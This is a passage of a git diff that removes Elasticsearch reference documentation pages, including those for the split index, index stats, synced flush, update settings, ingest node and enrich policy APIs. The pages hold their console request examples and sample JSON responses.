will be applied by a template before you add it to the cluster, -you can pass a template configuration in the request body. -The specified template is used for the simulation if it has a higher priority than existing templates. - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate -{ - "index_patterns": ["my-index-*"], - "composed_of": ["ct2"], - "priority": 10, - "template": { - "settings": { - "index.number_of_replicas": 1 - } - } -} --------------------------------------------------- -// TEST[continued] - -The response shows any overlapping templates with a lower priority. 
-
-[source,console-result]
---------------------------------------------------------
-{
-  "template" : {
-    "settings" : {
-      "index" : {
-        "number_of_replicas" : "1"
-      }
-    },
-    "mappings" : {
-      "properties" : {
-        "@timestamp" : {
-          "type" : "date"
-        }
-      }
-    },
-    "aliases" : { }
-  },
-  "overlapping" : [
-    {
-      "name" : "final-template",
-      "index_patterns" : [
-        "my-index-*"
-      ]
-    }
-  ]
-}
---------------------------------------------------------
\ No newline at end of file
diff --git a/docs/reference/indices/split-index.asciidoc b/docs/reference/indices/split-index.asciidoc
deleted file mode 100644
index 8fad3c53854..00000000000
--- a/docs/reference/indices/split-index.asciidoc
+++ /dev/null
@@ -1,280 +0,0 @@
-[[indices-split-index]]
-=== Split index API
-++++
-Split index
-++++
-
-Splits an existing index into a new index with more primary shards.
-
-[source,console]
-----
-POST /my-index-000001/_split/split-my-index-000001
-{
-  "settings": {
-    "index.number_of_shards": 2
-  }
-}
-----
-// TEST[s/^/PUT my-index-000001\n{"settings":{"blocks.write":true}}\n/]
-
-
-[[split-index-api-request]]
-==== {api-request-title}
-
-`POST //_split/`
-
-`PUT //_split/`
-
-
-[[split-index-api-prereqs]]
-==== {api-prereq-title}
-
-
-Before you can split an index:
-
-* The index must be read-only.
-* The <> status must be green.
-
-You can make an index read-only
-with the following request:
-
-[source,console]
---------------------------------------------------
-PUT /my_source_index/_settings
-{
-  "settings": {
-    "index.blocks.write": true <1>
-  }
-}
---------------------------------------------------
-// TEST[s/^/PUT my_source_index\n/]
-
-<1> Prevents write operations to this index while still allowing metadata
-    changes like deleting the index.
-
-The current write index on a data stream cannot be split. In order to split
-the current write index, the data stream must first be
-<> so that a new write index is created
-and then the previous write index can be split.
-
-[[split-index-api-desc]]
-==== {api-description-title}
-
-The split index API allows you to split an existing index into a new index,
-where each original primary shard is split into two or more primary shards in
-the new index.
-
-The number of times the index can be split (and the number of shards that each
-original shard can be split into) is determined by the
-`index.number_of_routing_shards` setting. The number of routing shards
-specifies the hashing space that is used internally to distribute documents
-across shards with consistent hashing. For instance, a 5 shard index with
-`number_of_routing_shards` set to `30` (`5 x 2 x 3`) could be split by a
-factor of `2` or `3`. In other words, it could be split as follows:
-
-* `5` -> `10` -> `30` (split by 2, then by 3)
-* `5` -> `15` -> `30` (split by 3, then by 2)
-* `5` -> `30` (split by 6)
-
-`index.number_of_routing_shards` is a <>. You can only set `index.number_of_routing_shards` at index creation
-time or on a <>.
-
-.*Index creation example*
-[%collapsible]
-====
-The following <> creates the
-`my-index-000001` index with an `index.number_of_routing_shards` setting of `30`.
-
-[source,console]
-----
-PUT /my-index-000001
-{
-  "settings": {
-    "index": {
-      "number_of_routing_shards": 30
-    }
-  }
-}
-----
-// TEST[continued]
-====
-
-The `index.number_of_routing_shards` setting's default value depends
-on the number of primary shards in the original index.
-The default is designed to allow you to split
-by factors of 2 up to a maximum of 1024 shards. However, the original number
-of primary shards must be taken into account. For instance, an index created
-with 5 primary shards could be split into 10, 20, 40, 80, 160, 320, or a
-maximum of 640 shards (with a single split action or multiple split actions).
-
-If the original index contains one primary shard (or a multi-shard index has
-been <> down to a single primary shard), then the
-index may be split into an arbitrary number of shards greater than 1. The
-properties of the default number of routing shards will then apply to the
-newly split index.
-
-
-[[how-split-works]]
-===== How splitting works
-
-A split operation:
-
-. Creates a new target index with the same definition as the source
-  index, but with a larger number of primary shards.
-
-. Hard-links segments from the source index into the target index. (If
-  the file system doesn't support hard-linking, then all segments are copied
-  into the new index, which is a much more time consuming process.)
-
-. Hashes all documents again, after low level files are created, to delete
-  documents that belong to a different shard.
-
-. Recovers the target index as though it were a closed index which
-  had just been re-opened.
-
-
-[[incremental-resharding]]
-===== Why doesn't Elasticsearch support incremental resharding?
-
-Going from `N` shards to `N+1` shards, also known as incremental resharding, is
-indeed a feature that is supported by many key-value stores. Adding a new shard
-and pushing new data to this new shard only is not an option: this would likely
-be an indexing bottleneck, and figuring out which shard a document belongs to
-given its `_id`, which is necessary for get, delete and update requests, would
-become quite complex. This means that we need to rebalance existing data using
-a different hashing scheme.
-
-The most common way that key-value stores do this efficiently is by using
-consistent hashing. Consistent hashing only requires `1/N`-th of the keys to
-be relocated when growing the number of shards from `N` to `N+1`. However
-Elasticsearch's unit of storage, shards, are Lucene indices. Because of their
-search-oriented data structure, taking a significant portion of a Lucene index,
-be it only 5% of documents, deleting them and indexing them on another shard
-typically comes with a much higher cost than with a key-value store. This cost
-is kept reasonable when growing the number of shards by a multiplicative factor
-as described in the above section: this allows Elasticsearch to perform the
-split locally, which in turn makes it possible to perform the split at the
-index level rather than reindexing documents that need to move, as well as
-using hard links for efficient file copying.
-
-In the case of append-only data, it is possible to get more flexibility by
-creating a new index and pushing new data to it, while adding an alias that
-covers both the old and the new index for read operations. Assuming that the
-old and new indices have respectively +M+ and +N+ shards, this has no overhead
-compared to searching an index that would have +M+N+ shards.
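-
-For example, assuming two hypothetical indices `my-old-index` and
-`my-new-index`, a single alias can cover both of them for read operations
-(this is only a sketch of the pattern described above):
-
-[source,console]
---------------------------------------------------
-POST /_aliases
-{
-  "actions": [
-    { "add": { "index": "my-old-index", "alias": "my-read-alias" } },
-    { "add": { "index": "my-new-index", "alias": "my-read-alias" } }
-  ]
-}
---------------------------------------------------
-// TEST[skip:illustrative sketch, the indices referenced here are hypothetical]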
-
-
-[[split-index]]
-===== Split an index
-
-To split `my_source_index` into a new index called `my_target_index`, issue
-the following request:
-
-[source,console]
---------------------------------------------------
-POST /my_source_index/_split/my_target_index
-{
-  "settings": {
-    "index.number_of_shards": 2
-  }
-}
---------------------------------------------------
-// TEST[continued]
-
-The above request returns immediately once the target index has been added to
-the cluster state -- it doesn't wait for the split operation to start.
-
-[IMPORTANT]
-=====================================
-
-Indices can only be split if they satisfy the following requirements:
-
-* The target index must not exist.
-
-* The source index must have fewer primary shards than the target index.
-
-* The number of primary shards in the target index must be a multiple of the
-  number of primary shards in the source index.
-
-* The node handling the split process must have sufficient free disk space to
-  accommodate a second copy of the existing index.
-
-=====================================
-
-The `_split` API is similar to the <>
-and accepts `settings` and `aliases` parameters for the target index:
-
-[source,console]
---------------------------------------------------
-POST /my_source_index/_split/my_target_index
-{
-  "settings": {
-    "index.number_of_shards": 5 <1>
-  },
-  "aliases": {
-    "my_search_indices": {}
-  }
-}
---------------------------------------------------
-// TEST[s/^/PUT my_source_index\n{"settings": {"index.blocks.write": true, "index.number_of_shards": "1"}}\n/]
-
-<1> The number of shards in the target index. This must be a multiple of the
-    number of shards in the source index.
-
-
-NOTE: Mappings may not be specified in the `_split` request.
-
-
-[[monitor-split]]
-===== Monitor the split process
-
-The split process can be monitored with the <>, or the <> can be used to wait
-until all primary shards have been allocated by setting the `wait_for_status`
-parameter to `yellow`.
-
-The `_split` API returns as soon as the target index has been added to the
-cluster state, before any shards have been allocated. At this point, all
-shards are in the state `unassigned`. If, for any reason, the target index
-can't be allocated, its primary shard will remain `unassigned` until it
-can be allocated.
-
-Once the primary shard is allocated, it moves to state `initializing`, and the
-split process begins. When the split operation completes, the shard will
-become `active`. At that point, Elasticsearch will try to allocate any
-replicas and may decide to relocate the primary shard to another node.
-
-
-[[split-wait-active-shards]]
-===== Wait for active shards
-
-Because the split operation creates a new index to split the shards to,
-the <> setting
-on index creation applies to the split index action as well.
-
-
-[[split-index-api-path-params]]
-==== {api-path-parms-title}
-
-``::
-(Required, string)
-Name of the source index to split.
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index] - - -[[split-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[split-index-api-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-aliases] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-settings] diff --git a/docs/reference/indices/stats.asciidoc b/docs/reference/indices/stats.asciidoc deleted file mode 100644 index afd8409a48c..00000000000 --- a/docs/reference/indices/stats.asciidoc +++ /dev/null @@ -1,143 +0,0 @@ -[[indices-stats]] -=== Index stats API -++++ -Index stats -++++ - -Returns statistics for one or more indices. For data streams, the API retrieves -statistics for the stream's backing indices. - -[source,console] ----- -GET /my-index-000001/_stats ----- -// TEST[setup:my_index] - - -[[index-stats-api-request]] -==== {api-request-title} - -`GET //_stats/` - -`GET //_stats` - -`GET /_stats` - - -[[index-stats-api-desc]] -==== {api-description-title} - -Use the index stats API to get high-level aggregation and statistics for one or -more data streams and indices. - -By default, -the returned statistics are index-level -with `primaries` and `total` aggregations. -`primaries` are the values for only the primary shards. -`total` are the accumulated values for both primary and replica shards. - -To get shard-level statistics, -set the `level` parameter to `shards`. - -[NOTE] -==== -When moving to another node, -the shard-level statistics for a shard are cleared. -Although the shard -is no longer part of the node, -that node retains any node-level statistics -to which the shard contributed. -==== - - -[[index-stats-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-metric] - - -[[index-stats-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=completion-fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fielddata-fields] - -`forbid_closed_indices`:: -(Optional, Boolean) -If `true`, statistics are *not* collected from closed indices. -Defaults to `true`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=groups] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=level] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-segment-file-sizes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-unloaded-segments] - - -[[index-stats-api-example]] -==== {api-examples-title} - - -[[index-stats-api-multiple-ex]] -===== Get statistics for multiple data streams and indices - -[source,console] --------------------------------------------------- -GET /index1,index2/_stats --------------------------------------------------- -// TEST[s/^/PUT index1\nPUT index2\n/] - - -[[index-stats-api-all-ex]] -===== Get statistics for all data streams and indices in a cluster - -[source,console] --------------------------------------------------- -GET /_stats --------------------------------------------------- -// TEST[setup:my_index] - - -[[index-stats-api-specific-stats-ex]] -===== Get specific statistics - -The following request returns -only the `merge` and `refresh` statistics -for all indices. - -[source,console] --------------------------------------------------- -GET /_stats/merge,refresh --------------------------------------------------- -// TEST[setup:my_index] - - -[[index-stats-api-specific-groups-ex]] -===== Get statistics for specific search groups - -The following request returns -only search statistics -for the `group1` and `group2` search groups. - -[source,console] --------------------------------------------------- -GET /_stats/search?groups=group1,group2 --------------------------------------------------- -// TEST[setup:my_index] diff --git a/docs/reference/indices/synced-flush.asciidoc b/docs/reference/indices/synced-flush.asciidoc deleted file mode 100644 index fc2dc9cd27b..00000000000 --- a/docs/reference/indices/synced-flush.asciidoc +++ /dev/null @@ -1,279 +0,0 @@ -[[indices-synced-flush-api]] -=== Synced flush API -++++ -Synced flush -++++ - -deprecated::[7.6, "Synced-flush is deprecated and will be removed in 8.0. Use <> instead. A flush has the same effect as a synced flush on Elasticsearch 7.6 or later."] - -Performs a synced flush on one or more indices. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_flush/synced --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - - -[[synced-flush-api-request]] -==== {api-request-title} - -`POST //_flush/synced` - -`GET //_flush/synced` - -`POST /_flush/synced` - -`GET /_flush/synced` - - -[[synced-flush-api-desc]] -==== {api-description-title} - -[[synced-flush-using-api]] -===== Use the synced flush API - -Use the synced flush API to manually initiate a synced flush. -This can be useful for a planned cluster restart where -you can stop indexing but don't want to wait for 5 minutes until all indices -are marked as inactive and automatically sync-flushed. - -You can request a synced flush even if there is ongoing indexing activity, and -{es} will perform the synced flush on a "best-effort" basis: shards that do not -have any ongoing indexing activity will be successfully sync-flushed, and other -shards will fail to sync-flush. The successfully sync-flushed shards will have -faster recovery times as long as the `sync_id` marker is not removed by a -subsequent flush. 
- - -[[synced-flush-overview]] -===== Synced flush overview - -{es} keeps track of which shards have received indexing activity recently, and -considers shards that have not received any indexing operations for 5 minutes to -be inactive. - -When a shard becomes inactive {es} performs a special kind of flush -known as a *synced flush*. A synced flush performs a normal -<> on each replica of the shard, and then adds a marker known -as the `sync_id` to each replica to indicate that these copies have identical -Lucene indices. Comparing the `sync_id` markers of the two copies is a very -efficient way to check whether they have identical contents. - -When allocating shard replicas, {es} must ensure that each replica contains the -same data as the primary. If the shard copies have been synced-flushed and the -replica shares a `sync_id` with the primary then {es} knows that the two copies -have identical contents. This means there is no need to copy any segment files -from the primary to the replica, which saves a good deal of time during -recoveries and restarts. - -This is particularly useful for clusters having lots of indices which are very -rarely updated, such as with time-based indices. Without the synced flush -marker, recovery of this kind of cluster would be much slower. - - -[[synced-flush-sync-id-markers]] -===== Check for `sync_id` markers - -To check whether a shard has a `sync_id` marker or not, look for the `commit` -section of the shard stats returned by the <> API: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_stats?filter_path=**.commit&level=shards <1> --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - -<1> `filter_path` is used to reduce the verbosity of the response, but is entirely optional - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "my-index-000001": { - "shards": { - "0": [ - { - "commit" : { - "id" : "3M3zkw2GHMo2Y4h4/KFKCg==", - "generation" : 3, - "user_data" : { - "translog_uuid" : "hnOG3xFcTDeoI_kvvvOdNA", - "history_uuid" : "XP7KDJGiS1a2fHYiFL5TXQ", - "local_checkpoint" : "-1", - "translog_generation" : "2", - "max_seq_no" : "-1", - "sync_id" : "AVvFY-071siAOuFGEO9P", <1> - "max_unsafe_auto_id_timestamp" : "-1", - "min_retained_seq_no" : "0" - }, - "num_docs" : 0 - } - } - ] - } - } - } -} --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] -<1> the `sync id` marker - -NOTE: The `sync_id` marker is removed as soon as the shard is flushed again, and -{es} may trigger an automatic flush of a shard at any time if there are -unflushed operations in the shard's translog. In practice this means that one -should consider any indexing operation on an index as having removed its -`sync_id` markers. - - -[[synced-flush-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -To sync-flush all indices, -omit this parameter -or use a value of `_all` or `*`. - - -[[synced-flush-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - - -[[synced-flush-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -All shards successfully sync-flushed. - -`409`:: -A replica shard failed to sync-flush. - - -[[synced-flush-api-example]] -==== {api-examples-title} - - -[[synced-flush-api-specific-ex]] -===== Sync-flush a specific index - -[source,console] ----- -POST /kimchy/_flush/synced ----- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - - -[[synced-flush-api-multi-ex]] -===== Synch-flush several indices - -[source,console] --------------------------------------------------- -POST /kimchy,elasticsearch/_flush/synced --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - - -[[synced-flush-api-all-ex]] -===== Sync-flush all indices - -[source,console] --------------------------------------------------- -POST /_flush/synced --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - -The response contains details about how many shards were successfully -sync-flushed and information about any failure. - -The following response indicates two shards -and one replica shard -successfully sync-flushed: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "successful": 2, - "failed": 0 - }, - "my-index-000001": { - "total": 2, - "successful": 2, - "failed": 0 - } -} --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - -The following response indicates one shard group failed -due to pending operations: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 4, - "successful": 2, - "failed": 2 - }, - "my-index-000001": { - "total": 4, - "successful": 2, - "failed": 2, - "failures": [ - { - "shard": 1, - "reason": "[2] ongoing operations on primary" - } - ] - } -} --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - -Sometimes the failures are specific to a shard replica. The copies that failed -will not be eligible for fast recovery but those that succeeded still will be. -This case is reported as follows: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 4, - "successful": 1, - "failed": 1 - }, - "my-index-000001": { - "total": 4, - "successful": 3, - "failed": 1, - "failures": [ - { - "shard": 1, - "reason": "unexpected error", - "routing": { - "state": "STARTED", - "primary": false, - "node": "SZNr2J_ORxKTLUCydGX4zA", - "relocating_node": null, - "shard": 1, - "index": "my-index-000001" - } - } - ] - } -} --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] diff --git a/docs/reference/indices/types-exists.asciidoc b/docs/reference/indices/types-exists.asciidoc deleted file mode 100644 index 87a1c471d4d..00000000000 --- a/docs/reference/indices/types-exists.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ -[[indices-types-exists]] -=== Type exists API -++++ -Type exists -++++ - -deprecated::[7.0.0, Types are deprecated and are in the process of being removed. See <>.] - -Checks if a <> exists. 
- -[source,console] ----- -HEAD my-index-000001/_mapping/message ----- -// TEST[setup:my_index] -// TEST[warning:Type exists requests are deprecated, as types have been deprecated.] - - -[[indices-types-exists-api-request]] -==== {api-request-title} - -`HEAD //_mapping/` - - -[[indices-types-exists-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=type] - - -[[indices-types-exists-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -Indicates all specified mapping types exist. - - `404`:: -Indicates one or more specified mapping types **do not** exist. diff --git a/docs/reference/indices/update-settings.asciidoc b/docs/reference/indices/update-settings.asciidoc deleted file mode 100644 index 4afb12120e7..00000000000 --- a/docs/reference/indices/update-settings.asciidoc +++ /dev/null @@ -1,186 +0,0 @@ -[[indices-update-settings]] -=== Update index settings API -++++ -Update index settings -++++ - -Changes a <> in real time. - -For data streams, index setting changes are applied to all backing indices by -default. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index" : { - "number_of_replicas" : 2 - } -} --------------------------------------------------- -// TEST[setup:my_index] - - -[[update-index-settings-api-request]] -==== {api-request-title} - -`PUT //_settings` - - -[[update-index-settings-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[update-index-settings-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`preserve_existing`:: -(Optional, Boolean) If `true`, existing index settings remain unchanged. -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[update-index-settings-api-request-body]] -==== {api-request-body-title} - -`settings`:: -(Optional, <>) Configuration -options for the index. See <>. - -[[update-index-settings-api-example]] -==== {api-examples-title} - -[[reset-index-setting]] -===== Reset an index setting -To revert a setting to the default value, use `null`. For example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index" : { - "refresh_interval" : null - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The list of per-index settings which can be updated dynamically on live -indices can be found in <>. -To preserve existing settings from being updated, the `preserve_existing` -request parameter can be set to `true`. - -[[bulk]] -===== Bulk indexing usage - -For example, the update settings API can be used to dynamically change -the index from being more performant for bulk indexing, and then move it -to more real time indexing state. 
Before the bulk indexing is started,
-use:
-
-[source,console]
--------------------------------------------------
-PUT /my-index-000001/_settings
-{
-  "index" : {
-    "refresh_interval" : "-1"
-  }
-}
--------------------------------------------------
-// TEST[setup:my_index]
-
-(Another optimization option is to start the index without any replicas,
-and only add them later, but that really depends on the use case).
-
-Then, once bulk indexing is done, the settings can be updated (back to
-the defaults for example):
-
-[source,console]
--------------------------------------------------
-PUT /my-index-000001/_settings
-{
-  "index" : {
-    "refresh_interval" : "1s"
-  }
-}
--------------------------------------------------
-// TEST[continued]
-
-Finally, call a force merge:
-
-[source,console]
--------------------------------------------------
-POST /my-index-000001/_forcemerge?max_num_segments=5
--------------------------------------------------
-// TEST[continued]
-
-[[update-settings-analysis]]
-===== Update index analysis
-
-You can only define new analyzers on closed indices.
-
-To add an analyzer,
-you must close the index,
-define the analyzer,
-and reopen the index.
-
-[NOTE]
-====
-You cannot close the write index of a data stream.
-
-To update the analyzer for a data stream's write index and future backing
-indices, update the analyzer in the <>. Then <> to apply the new analyzer to the stream’s write index and
-future backing indices. This affects searches and any new data added to the
-stream after the rollover. However, it does not affect the data stream's backing
-indices or their existing data.
-
-To change the analyzer for existing backing indices, you must create a
-new data stream and reindex your data into it. See
-<>.
-====
-
-For example,
-the following commands add the `content` analyzer to the `my-index-000001` index:
-
-[source,console]
--------------------------------------------------
-POST /my-index-000001/_close
-
-PUT /my-index-000001/_settings
-{
-  "analysis" : {
-    "analyzer":{
-      "content":{
-        "type":"custom",
-        "tokenizer":"whitespace"
-      }
-    }
-  }
-}
-
-POST /my-index-000001/_open
--------------------------------------------------
-// TEST[setup:my_index]
diff --git a/docs/reference/ingest.asciidoc b/docs/reference/ingest.asciidoc
deleted file mode 100644
index 3110a2df96f..00000000000
--- a/docs/reference/ingest.asciidoc
+++ /dev/null
@@ -1,89 +0,0 @@
-[[ingest]]
-= Ingest node
-
-[partintro]
---
-Use an ingest node to pre-process documents before the actual document indexing happens.
-The ingest node intercepts bulk and index requests, applies transformations, and then
-passes the documents back to the index or bulk APIs.
-
-All nodes enable ingest by default, so any node can handle ingest tasks. You can also
-create a dedicated ingest node by configuring the following setting in the
-elasticsearch.yml file (to disable ingest for a node, omit `ingest` from its
-`node.roles` list):
-
-[source,yaml]
-----
-node.roles: [ ingest ]
-----
-
-To pre-process documents before indexing, <> that specifies a series of
-<>. Each processor transforms the document in some specific way. For example, a
-pipeline might have one processor that removes a field from the document, followed by
-another processor that renames a field. The <> then stores
-the configured pipelines.
-
-To use a pipeline, specify the `pipeline` parameter on an index or bulk request. This
-way, the ingest node knows which pipeline to use.
- -For example: -Create a pipeline - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/my_pipeline_id -{ - "description" : "describe pipeline", - "processors" : [ - { - "set" : { - "field": "foo", - "value": "new" - } - } - ] -} --------------------------------------------------- - -Index with defined pipeline - -[source,console] --------------------------------------------------- -PUT my-index-00001/_doc/my-id?pipeline=my_pipeline_id -{ - "foo": "bar" -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-00001", - "_type" : "_doc", - "_id" : "my-id", - "_version" : 1, - "result" : "created", - "_shards" : { - "total" : 2, - "successful" : 2, - "failed" : 0 - }, - "_seq_no" : 0, - "_primary_term" : 1 -} --------------------------------------------------- -// TESTRESPONSE[s/"successful" : 2/"successful" : 1/] - -An index may also declare a <> that will be used in the -absence of the `pipeline` parameter. - -Finally, an index may also declare a <> -that will be executed after any request or default pipeline (if any). - -See <> for more information about creating, adding, and deleting pipelines. - --- - -include::ingest/ingest-node.asciidoc[] diff --git a/docs/reference/ingest/apis/delete-pipeline.asciidoc b/docs/reference/ingest/apis/delete-pipeline.asciidoc deleted file mode 100644 index 368f9f2b026..00000000000 --- a/docs/reference/ingest/apis/delete-pipeline.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[delete-pipeline-api]] -=== Delete pipeline API -++++ -Delete pipeline -++++ - -Deletes one or more existing ingest pipeline. - -//// -[source,console] ----- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "example pipeline to delete", - "processors" : [ ] -} - -PUT /_ingest/pipeline/pipeline-one -{ - "description" : "another example pipeline to delete", - "processors" : [ ] -} ----- -// TESTSETUP -//// - -[source,console] ----- -DELETE /_ingest/pipeline/my-pipeline-id ----- - - -[[delete-pipeline-api-request]] -==== {api-request-title} - -`DELETE /_ingest/pipeline/` - -[[delete-pipeline-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`manage_pipeline`, `manage_ingest_pipelines`, or `manage` -<> to use this API. - -[[delete-pipeline-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) Pipeline ID or wildcard expression of pipeline IDs -used to limit the request. - -To delete all ingest pipelines in a cluster, -use a value of `*`. 
--- - - -[[delete-pipeline-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[delete-pipeline-api-api-example]] -==== {api-examples-title} - - -[[delete-pipeline-api-specific-ex]] -===== Delete a specific ingest pipeline - -[source,console] ----- -DELETE /_ingest/pipeline/pipeline-one ----- - - -[[delete-pipeline-api-wildcard-ex]] -===== Delete ingest pipelines using a wildcard expression - -[source,console] ----- -DELETE /_ingest/pipeline/pipeline-* ----- - - -[[delete-pipeline-api-all-ex]] -===== Delete all ingest pipelines - -[source,console] ----- -DELETE /_ingest/pipeline/* ----- - -//// -[source,console-result] ----- -{ -"acknowledged": true -} ----- -//// diff --git a/docs/reference/ingest/apis/enrich/delete-enrich-policy.asciidoc b/docs/reference/ingest/apis/enrich/delete-enrich-policy.asciidoc deleted file mode 100644 index cc26030369d..00000000000 --- a/docs/reference/ingest/apis/enrich/delete-enrich-policy.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[delete-enrich-policy-api]] -=== Delete enrich policy API -++++ -Delete enrich policy -++++ - -Deletes an existing <> and its -<>. - -//// -[source,console] ----- -PUT /users -{ - "mappings": { - "properties": { - "email": { "type": "keyword" } - } - } -} - -PUT /_enrich/policy/my-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": [ "first_name", "last_name", "city", "zip", "state" ] - } -} ----- -// TESTSETUP -//// - -[source,console] --------------------------------------------------- -DELETE /_enrich/policy/my-policy --------------------------------------------------- - - -[[delete-enrich-policy-api-request]] -==== {api-request-title} - -`DELETE /_enrich/policy/` - - -[[delete-enrich-policy-api-prereqs]] -==== {api-prereq-title} - -include::put-enrich-policy.asciidoc[tag=enrich-policy-api-prereqs] - - -[[delete-enrich-policy-api-desc]] -==== {api-description-title} - -Use the delete enrich policy API -to delete an existing enrich policy -and its enrich index. - -[IMPORTANT] -==== -You must remove an enrich policy -from any in-use ingest pipelines -before deletion. -You cannot remove in-use enrich policies. -==== - - -[[delete-enrich-policy-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Enrich policy to delete. diff --git a/docs/reference/ingest/apis/enrich/enrich-stats.asciidoc b/docs/reference/ingest/apis/enrich/enrich-stats.asciidoc deleted file mode 100644 index f7bc9680db6..00000000000 --- a/docs/reference/ingest/apis/enrich/enrich-stats.asciidoc +++ /dev/null @@ -1,135 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[enrich-stats-api]] -=== Enrich stats API -++++ -Enrich stats -++++ - -Returns <> statistics -and information about <> -that are currently executing. - -[source,console] ----- -GET /_enrich/_stats ----- - - -[[enrich-stats-api-request]] -==== {api-request-title} - -`GET /_enrich/_stats` - - -[[enrich-stats-api-response-body]] -==== {api-response-body-title} - -`executing_policies`:: -+ --- -(Array of objects) -Objects containing information -about each enrich policy -that is currently executing. - -Returned parameters include: - -`name`:: -(String) -Name of the enrich policy. - -`task`:: -(<>) -Object containing detailed information -about the policy execution task. --- - -`coordinator_stats`:: -+ --- -(Array of objects) -Objects containing information -about each <> -for configured enrich processors. 
- -Returned parameters include: - -`node_id`:: -(String) -ID of the ingest node coordinating search requests -for configured enrich processors. - -`queue_size`:: -(Integer) -Number of search requests in the queue. - -`remote_requests_current`:: -(Integer) -Current number of outstanding remote requests. - -`remote_requests_total`:: -(Integer) -Number of outstanding remote requests executed -since node startup. -+ -In most cases, -a remote request includes multiple search requests. -This depends on the number of search requests in the queue -when the remote request is executed. - -`executed_searches_total`:: -(Integer) -Number of search requests -that enrich processors have executed -since node startup. --- - - -[[enrich-stats-api-example]] -==== {api-examples-title} - - -[source,console] ----- -GET /_enrich/_stats ----- -//TEST[s/^/PUT \/_enrich\/policy\/my-policy\/_execute\/n/\ - -The API returns the following response: - -[source,console-result] ----- -{ - "executing_policies": [ - { - "name": "my-policy", - "task": { - "id": 124, - "type": "direct", - "action": "cluster:admin/xpack/enrich/execute", - "start_time_in_millis": 1458585884904, - "running_time_in_nanos": 47402, - "cancellable": false, - 